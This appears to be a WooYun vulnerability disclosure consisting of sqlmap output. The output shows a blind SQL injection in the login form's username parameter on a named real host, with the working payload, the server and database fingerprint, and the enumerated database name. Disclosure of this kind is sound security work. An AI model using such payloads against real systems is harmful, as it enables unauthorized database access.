WooYun.org

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: passwd=admin&username=-6486' OR 4193=4193#
---
[23:41:36] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.5.18, Apache 2.2.15
back-end DBMS: MySQL 5
[23:41:36] [INFO] fetching database names
[23:41:36] [INFO] fetching number of databases
[23:41:36] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[23:41:36] [INFO] retrieved:
[23:41:37] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[23:41:37] [ERROR] unable to retrieve the number of databases
[23:41:37] [INFO] falling back to current database
[23:41:37] [INFO] fetching current database
[23:41:37] [INFO] resumed: databusi
available databases [1]:
[*] databusi
[23:41:37] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\int.variflight.com'